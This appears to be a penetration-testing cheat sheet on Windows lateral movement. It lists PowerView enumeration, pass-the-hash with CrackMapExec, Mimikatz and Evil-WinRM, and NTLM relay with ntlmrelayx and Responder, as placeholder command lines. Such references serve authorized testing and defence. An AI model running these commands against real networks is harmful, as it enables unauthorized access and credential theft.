
Lateral Movement

  1. PowerView
     Description: Enumerate AD information to identify targets for lateral movement.
     Tools/Commands:
     • Import-Module PowerView; Get-NetGroupMember -GroupName "Administrators"
     • Get-NetSession
     • Find-DomainShare

  2. Pass-the-Hash (PtH)
     Description: Authenticate to remote systems using NTLM hashes instead of passwords.
     Tools/Commands:
     • CrackMapExec: crackmapexec smb <IP> -u <USER> -H <HASH>
     • Mimikatz: sekurlsa::pth /user:<USER> /domain:<DOMAIN> /ntlm:<HASH>
     • Evil-WinRM: evil-winrm -i <IP> -u <USER> -H <HASH>

  3. NTLM Relay
     Description: Relay NTLM authentication to authenticate against other systems.
     Tools/Commands:
     • NTLMRelayX: ntlmrelayx.py -t <target>
     • Responder: responder -I <interface>
     • CrackMapExec: crackmapexec smb <IP> -u <USER> -p <PASS>
